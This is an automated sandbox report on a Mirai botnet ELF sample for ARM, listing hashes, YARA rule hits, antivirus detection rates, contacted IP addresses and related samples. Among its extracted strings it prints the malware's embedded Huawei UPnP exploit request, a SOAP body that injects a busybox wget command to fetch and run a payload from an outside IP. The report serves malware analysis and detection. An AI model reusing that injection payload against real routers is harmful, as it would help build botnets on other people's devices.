Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
r41xp4rOln.elf

Overview

General Information

Sample Name:r41xp4rOln.elf
Original Sample Name:b4a329fd91d515cb3244886b5272503d.elf
Analysis ID:830737
MD5:b4a329fd91d515cb3244886b5272503d
SHA1:e403940645e7292328eb6b9a7f47c25b08dc228d
SHA256:de5e60ab541838c4c3cb0bfd0733417f2fe4a19bac08683391022cdaabe263de
Tags:32armelfmirai
Infos:

Detection

Mirai
Score:64
Range:0 - 100
Whitelisted:false

Signatures

Malicious sample detected (through community Yara rule)
Yara detected Mirai
Multi AV Scanner detection for submitted file
Yara signature match
Sample has stripped symbol table
Uses the "uname" system call to query kernel version information (possible evasion)
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Detected TCP or UDP traffic on non-standard ports
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

Analysis Advice

Static ELF header machine description suggests that the sample might not execute correctly on this machine.
All HTTP servers contacted by the sample do not answer. The sample is likely an old dropper which does no longer work.
Non-zero exit code suggests an error during the execution. Lookup the error code for hints.
Static ELF header machine description suggests that the sample might only run correctly on MIPS or ARM architectures.
Joe Sandbox Version:37.0.0 Beryl
Analysis ID:830737
Start date and time:2023-03-20 16:47:30 +01:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 6m 53s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample file name:r41xp4rOln.elf
Original Sample Name:b4a329fd91d515cb3244886b5272503d.elf
Detection:MAL
Classification:mal64.troj.linELF@0/0@0/0
Command:/tmp/r41xp4rOln.elf
PID:6224
Exit Code:255
Exit Code Info:
Killed:False
Standard Output:

Standard Error:/lib/ld-uClibc.so.0: No such file or directory
  • system is lnxubuntu20
  • r41xp4rOln.elf (PID: 6224, Parent: 6120, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/r41xp4rOln.elf
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
r41xp4rOln.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
    r41xp4rOln.elfLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
    • 0x8cf4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x8d08:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x8d1c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x8d30:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x8d44:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x8d58:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x8d6c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x8d80:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x8d94:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x8da8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x8dbc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x8dd0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x8de4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x8df8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x8e0c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x8e20:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x8e34:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x8e48:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x8e5c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x8e70:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x8e84:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    SourceRuleDescriptionAuthorStrings
    6224.1.00007f28d8028000.00007f28d8029000.rw-.sdmpLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
    • 0x0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x14:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x28:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x3c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x50:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x64:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x78:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x8c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0xa0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0xb4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0xc8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    6224.1.00007f28d8017000.00007f28d8021000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      6224.1.00007f28d8017000.00007f28d8021000.r-x.sdmpLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
      • 0x8cf4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x8d08:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x8d1c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x8d30:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x8d44:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x8d58:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x8d6c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x8d80:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x8d94:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x8da8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x8dbc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x8dd0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x8de4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x8df8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x8e0c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x8e20:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x8e34:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x8e48:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x8e5c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x8e70:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x8e84:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      Process Memory Space: r41xp4rOln.elf PID: 6224Linux_Trojan_Gafgyt_28a2fe0cunknownunknown
      • 0x1141e:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x11432:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x11446:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1145a:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1146e:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x11482:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x11496:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x114aa:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x114be:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x114d2:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x114e6:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x12bcb:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x12bdf:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x12bf3:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x12c07:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x12c1b:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x12c2f:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x12c43:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x12c57:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x12c6b:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x12c7f:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      No Snort rule has matched

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: r41xp4rOln.elfReversingLabs: Detection: 58%
      Source: r41xp4rOln.elfVirustotal: Detection: 62%Perma Link
      Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
      Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
      Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
      Source: global trafficTCP traffic: 192.168.2.23:51628 -> 103.161.181.97:56999
      Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
      Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
      Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
      Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
      Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
      Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
      Source: unknownTCP traffic detected without corresponding DNS query: 103.161.181.97
      Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
      Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
      Source: r41xp4rOln.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
      Source: r41xp4rOln.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/

      System Summary

      barindex
      Source: r41xp4rOln.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
      Source: 6224.1.00007f28d8028000.00007f28d8029000.rw-.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
      Source: 6224.1.00007f28d8017000.00007f28d8021000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
      Source: Process Memory Space: r41xp4rOln.elf PID: 6224, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
      Source: r41xp4rOln.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
      Source: 6224.1.00007f28d8028000.00007f28d8029000.rw-.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
      Source: 6224.1.00007f28d8017000.00007f28d8021000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
      Source: Process Memory Space: r41xp4rOln.elf PID: 6224, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
      Source: ELF static info symbol of initial sample.symtab present: no
      Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: Initial sampleString containing 'busybox' found: HTTP/1.1 200 OKarmarm7mipsmipselx86_64sh4ppcm68k<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
      Source: Initial sampleString containing 'busybox' found: bin/busybox
      Source: Initial sampleString containing 'busybox' found: /bin/busybox
      Source: Initial sampleString containing 'busybox' found: f%s:%dwebservbinbin/busyboxbin/watchdogbin/systemd/bin/busybox/bin/watchdog/bin/systemdH
      Source: classification engineClassification label: mal64.troj.linELF@0/0@0/0
      Source: /tmp/r41xp4rOln.elf (PID: 6224)Queries kernel information via 'uname': Jump to behavior
      Source: r41xp4rOln.elf, 6224.1.00007ffdd0b85000.00007ffdd0ba6000.rw-.sdmpBinary or memory string: ~x86_64/usr/bin/qemu-arm/tmp/r41xp4rOln.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/r41xp4rOln.elf
      Source: r41xp4rOln.elf, 6224.1.00007ffdd0b85000.00007ffdd0ba6000.rw-.sdmpBinary or memory string: qemu: %s: %s
      Source: r41xp4rOln.elf, 6224.1.00007ffdd0b85000.00007ffdd0ba6000.rw-.sdmpBinary or memory string: leqemu: %s: %s
      Source: r41xp4rOln.elf, 6224.1.00005633b74e4000.00005633b7612000.rw-.sdmpBinary or memory string: 3V!/etc/qemu-binfmt/arm
      Source: r41xp4rOln.elf, 6224.1.00005633b74e4000.00005633b7612000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
      Source: r41xp4rOln.elf, 6224.1.00007ffdd0b85000.00007ffdd0ba6000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
      Source: r41xp4rOln.elf, 6224.1.00005633b74e4000.00005633b7612000.rw-.sdmpBinary or memory string: rg.qemu.gdb.arm.sys.regs">
      Source: r41xp4rOln.elf, 6224.1.00005633b74e4000.00005633b7612000.rw-.sdmpBinary or memory string: 3Vrg.qemu.gdb.arm.sys.regs">

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: r41xp4rOln.elf, type: SAMPLE
      Source: Yara matchFile source: 6224.1.00007f28d8017000.00007f28d8021000.r-x.sdmp, type: MEMORY

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: r41xp4rOln.elf, type: SAMPLE
      Source: Yara matchFile source: 6224.1.00007f28d8017000.00007f28d8021000.r-x.sdmp, type: MEMORY
      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsWindows Management InstrumentationPath InterceptionPath InterceptionDirect Volume AccessOS Credential Dumping11
      Security Software Discovery
      Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
      Encrypted Channel
      Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
      Non-Standard Port
      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
      Application Layer Protocol
      Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      No configs have been found
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Number of created Files
      • Is malicious
      • Internet
      SourceDetectionScannerLabelLink
      r41xp4rOln.elf59%ReversingLabsLinux.Trojan.Mirai
      r41xp4rOln.elf62%VirustotalBrowse
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      No contacted domains info
      NameSourceMaliciousAntivirus DetectionReputation
      http://schemas.xmlsoap.org/soap/encoding/r41xp4rOln.elffalse
        high
        http://schemas.xmlsoap.org/soap/envelope/r41xp4rOln.elffalse
          high
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          109.202.202.202
          unknownSwitzerland
          13030INIT7CHfalse
          91.189.91.43
          unknownUnited Kingdom
          41231CANONICAL-ASGBfalse
          103.161.181.97
          unknownunknown
          7575AARNET-AS-APAustralianAcademicandResearchNetworkAARNefalse
          91.189.91.42
          unknownUnited Kingdom
          41231CANONICAL-ASGBfalse
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          109.202.202.202SecuriteInfo.com.Trojan.Linux.Mirai.SEZ.1879.25477.elfGet hashmaliciousUnknownBrowse
            wRinu5Qx9K.elfGet hashmaliciousMirai, MoobotBrowse
              qEfVrhh25G.elfGet hashmaliciousMirai, MoobotBrowse
                6fu2wi1SlA.elfGet hashmaliciousMiraiBrowse
                  c09YQAO5S4.elfGet hashmaliciousMiraiBrowse
                    q9VFuPiu3z.elfGet hashmaliciousMirai, MoobotBrowse
                      YQe0vz5de5.elfGet hashmaliciousMoobotBrowse
                        w7yT4EKpyC.elfGet hashmaliciousMoobotBrowse
                          21QpPfkJyE.elfGet hashmaliciousMoobotBrowse
                            FNZ2SfKqyF.elfGet hashmaliciousUnknownBrowse
                              xvBMD377TZ.elfGet hashmaliciousMoobotBrowse
                                itGQhTSMsG.elfGet hashmaliciousMoobotBrowse
                                  kDxTrX58nI.elfGet hashmaliciousMoobotBrowse
                                    8qCDoDoFsB.elfGet hashmaliciousMoobotBrowse
                                      Xr480VjSue.elfGet hashmaliciousMoobotBrowse
                                        qeqpGFEuxd.elfGet hashmaliciousUnknownBrowse
                                          zSoldrJdmj.elfGet hashmaliciousUnknownBrowse
                                            1ljAr9mkht.elfGet hashmaliciousUnknownBrowse
                                              S24hmHHsrk.elfGet hashmaliciousUnknownBrowse
                                                H1F1iOGtg4.elfGet hashmaliciousUnknownBrowse
                                                  No context
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  INIT7CHSecuriteInfo.com.Trojan.Linux.Mirai.SEZ.1879.25477.elfGet hashmaliciousUnknownBrowse
                                                  • 109.202.202.202
                                                  wRinu5Qx9K.elfGet hashmaliciousMirai, MoobotBrowse
                                                  • 109.202.202.202
                                                  qEfVrhh25G.elfGet hashmaliciousMirai, MoobotBrowse
                                                  • 109.202.202.202
                                                  6fu2wi1SlA.elfGet hashmaliciousMiraiBrowse
                                                  • 109.202.202.202
                                                  c09YQAO5S4.elfGet hashmaliciousMiraiBrowse
                                                  • 109.202.202.202
                                                  q9VFuPiu3z.elfGet hashmaliciousMirai, MoobotBrowse
                                                  • 109.202.202.202
                                                  YQe0vz5de5.elfGet hashmaliciousMoobotBrowse
                                                  • 109.202.202.202
                                                  w7yT4EKpyC.elfGet hashmaliciousMoobotBrowse
                                                  • 109.202.202.202
                                                  21QpPfkJyE.elfGet hashmaliciousMoobotBrowse
                                                  • 109.202.202.202
                                                  FNZ2SfKqyF.elfGet hashmaliciousUnknownBrowse
                                                  • 109.202.202.202
                                                  xvBMD377TZ.elfGet hashmaliciousMoobotBrowse
                                                  • 109.202.202.202
                                                  itGQhTSMsG.elfGet hashmaliciousMoobotBrowse
                                                  • 109.202.202.202
                                                  kDxTrX58nI.elfGet hashmaliciousMoobotBrowse
                                                  • 109.202.202.202
                                                  8qCDoDoFsB.elfGet hashmaliciousMoobotBrowse
                                                  • 109.202.202.202
                                                  Xr480VjSue.elfGet hashmaliciousMoobotBrowse
                                                  • 109.202.202.202
                                                  qeqpGFEuxd.elfGet hashmaliciousUnknownBrowse
                                                  • 109.202.202.202
                                                  zSoldrJdmj.elfGet hashmaliciousUnknownBrowse
                                                  • 109.202.202.202
                                                  1ljAr9mkht.elfGet hashmaliciousUnknownBrowse
                                                  • 109.202.202.202
                                                  S24hmHHsrk.elfGet hashmaliciousUnknownBrowse
                                                  • 109.202.202.202
                                                  H1F1iOGtg4.elfGet hashmaliciousUnknownBrowse
                                                  • 109.202.202.202
                                                  No context
                                                  No context
                                                  No created / dropped files found
                                                  File type:ELF 32-bit LSB executable, ARM, version 1 (ARM), dynamically linked, interpreter /lib/ld-uClibc.so.0, stripped
                                                  Entropy (8bit):6.078323327143867
                                                  TrID:
                                                  • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                  File name:r41xp4rOln.elf
                                                  File size:40744
                                                  MD5:b4a329fd91d515cb3244886b5272503d
                                                  SHA1:e403940645e7292328eb6b9a7f47c25b08dc228d
                                                  SHA256:de5e60ab541838c4c3cb0bfd0733417f2fe4a19bac08683391022cdaabe263de
                                                  SHA512:ed95c79d0c060f407277c4a346a5d27a1d1d86573410919a14bc762e64c6298c5f19077a539f5f07fb7715d25e235b56cb84277dccff437758ca773347f45e29
                                                  SSDEEP:768:MglA4CbIsG5f0OhnlUl0O9FRA1wArb9/3W5uv+bdLdUZXoTZJ/NbwW:MyabXG5fDlUlXjwVe4v+wZIqW
                                                  TLSH:CC03F751B8829A77C2E1137ABA6E5A8D337163E9C2CF7217DD214B20BAD511F0D23F85
